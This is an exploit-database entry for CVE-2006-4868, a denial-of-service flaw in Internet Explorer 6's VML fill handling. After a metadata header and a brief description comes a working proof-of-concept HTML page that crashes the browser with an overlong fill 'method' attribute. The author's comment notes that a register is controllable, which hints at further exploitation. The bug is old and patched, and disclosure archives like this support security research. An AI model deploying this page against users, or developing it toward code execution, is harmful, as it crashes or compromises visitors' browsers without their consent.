Microsoft Internet Explorer VML Fill Method DoS

vendor:

Internet Explorer

by:

Shirkdog

7,5

CVSS

HIGH

Denial of Service

CWE

Product Name: Internet Explorer

Affected Version From: Internet Explorer 6.0

Affected Version To: Internet Explorer 6.0

Patch Exists: YES

Related CWE: CVE-2006-4868

CPE: a:microsoft:internet_explorer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2006

Microsoft Internet Explorer VML Fill Method DoS

A denial of service vulnerability exists in Microsoft Internet Explorer when processing a VML (Vector Markup Language) element with a malformed fill method. This can be exploited to crash Internet Explorer by tricking a user into visiting a malicious web page.

Mitigation:

No known mitigation

Source

Exploit-DB raw data:

<!--
Currently just a DoS

EAX is controllable and currently it crashes when trying to move EBX into the location pointed to by EAX

Shirkdog
-->

<html xmlns:v="urn:schemas-microsoft-com:vml">

<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>

<body>


<v:rect style='width:120pt;height:80pt' fillcolor="red">
<v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCD01" angle="-45"
focus="100%" focusposition=".5,.5" focussize="0,0"
type="gradientRadial" />
</v:rect>

</body>
</html>

# milw0rm.com [2006-09-19]